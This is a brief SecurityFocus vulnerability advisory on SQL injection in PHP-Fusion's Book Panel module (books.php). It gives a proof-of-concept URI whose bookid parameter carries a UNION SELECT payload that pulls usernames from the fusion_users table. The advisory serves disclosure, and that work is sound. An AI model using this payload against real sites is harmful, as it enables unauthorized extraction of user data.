PHP-Fusion Book Panel Module 'books.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_name,4,5,6+from+fusion_users--


 

Privacy Statement
Copyright 2010, SecurityFocus